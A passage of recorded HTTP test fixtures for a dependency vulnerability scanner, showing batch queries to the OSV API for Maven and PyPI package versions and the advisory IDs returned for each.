"Maven", "name": "com.google.android.gms:play-services-identity" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-instantapps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-location" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-maps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-nearby" }, "version": "10.0.0" }, { "package": { 
"ecosystem": "Maven", "name": "com.google.android.gms:play-services-panorama" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-places" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-plus" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-safetynet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-api" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-v4-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tasks" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-vision" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wallet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wearable" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-appindexing" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-config" }, "version": "10.0.0" }, { "package": { "ecosystem": 
"Maven", "name": "com.google.firebase:firebase-crash" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-database" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-database-connection" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-messaging" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_multiple_registries url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 628 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-cm6r-892j-jv2g", "modified": "2023-11-08T04:08:28.014834Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": 
"GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "628" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 172 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_no_resolve_no_transitive url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 286 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "junit:junit" }, "version": "4.12" }, { "package": { "ecosystem": "Maven", "name": "org.hamcrest:hamcrest-core" }, "version": "1.3" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_non_utf8_encoding url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 98 body: | { "results": [ { "vulns": [ { "id": "GHSA-269g-pwp5-87pp", "modified": "2026-03-13T22:15:22.410895Z" } ] }, {} ] } headers: Content-Length: - "98" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 473 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: 
Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_transitive_default url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 381 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": "GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "381" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 473 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_transitive_explicit_lockfile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 381 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": "GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "381" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: 
proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 9305 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.android.support:animated-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:appcompat-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:mediarouter-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:palette-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-annotations" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-v4" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads-lite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-appinvite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth-base" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-awareness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": 
"com.google.android.gms:play-services-base" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-basement" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast-framework" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-clearcut" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-drive" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-fitness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-games" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gass" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gcm" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-identity" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-instantapps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-location" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-maps" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-nearby" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-panorama" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": 
"com.google.android.gms:play-services-places" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-plus" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-safetynet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-api" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tagmanager-v4-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-tasks" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-vision" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wallet" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-wearable" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-appindexing" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-config" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-crash" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": 
"com.google.firebase:firebase-database" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-database-connection" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-iid" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-messaging" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.firebase:firebase-storage-common" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-api" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core" }, "version": "2.14.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-web" }, "version": "2.14.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/pom.xml_transitive_native_source url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 628 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-cm6r-892j-jv2g", "modified": "2023-11-08T04:08:28.014834Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-7rjr-3q55-vv33", "modified": "2025-10-22T19:37:53.742023Z" }, { "id": "GHSA-8489-44mv-ggj8", "modified": "2025-05-09T13:12:38.923602Z" }, { "id": "GHSA-jfh8-c2jp-5v3q", "modified": "2025-10-22T19:37:02.616807Z" }, { "id": "GHSA-p6xc-xr62-6r2g", "modified": "2025-05-09T13:12:54.089856Z" }, { "id": "GHSA-vc5p-v9hr-52mj", "modified": "2026-02-04T03:10:00.616806Z" } ] }, {} ] } headers: Content-Length: - "628" Content-Type: - 
application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 386 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_no_resolve_no_transitive url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 1081 body: | { "results": [ { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] } ] } headers: Content-Length: - "1081" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 
proto_major: 1 proto_minor: 1 content_length: 997 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.3.1" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "flask-cors" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "pandas" }, "version": "0.23.4" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_resolution_fallback url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 880 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-43qf-4rqw-9q2g", "modified": "2026-02-04T02:30:19.251090Z" }, { "id": "GHSA-7rxf-gvfg-47g4", "modified": "2026-02-04T04:27:15.173118Z" }, { "id": "GHSA-84pr-m4jr-85g5", "modified": "2026-02-04T02:57:32.875272Z" }, { "id": "GHSA-8vgw-p6qm-5gr7", "modified": "2026-02-04T02:42:09.564281Z" }, { "id": "GHSA-hxwh-jpp2-84pm", "modified": "2026-02-04T02:15:39.891834Z" }, { "id": "GHSA-xc3p-ff3m-f46v", "modified": "2024-09-20T20:01:25.449661Z" }, { "id": "PYSEC-2020-43", "modified": "2025-10-09T07:22:50.566622Z" }, { "id": "PYSEC-2024-71", "modified": "2025-10-09T08:27:44.186589Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "PYSEC-2020-73", "modified": "2023-11-08T04:02:12.263851Z" } ] }, {} ] } headers: Content-Length: - "880" 
Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1610 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2026.2.25" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.3.1" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7.0" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2026.1.0.post1" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": "1.24.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_transitive_default url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2083 body: | { "results": [ {}, {}, {}, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": 
"GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, { "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, {} ] } headers: Content-Length: - "2083" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1604 host: api.osv.dev body: | 
{ "queries": [ { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2026.2.25" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.3.1" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2026.1.post1" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": "1.24.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Transitive/requirements.txt_transitive_native_source url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2083 body: | { "results": [ {}, {}, {}, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": 
"GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, { "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, {} ] } headers: Content-Length: - "2083" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_WithDetector_OffLinux.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 
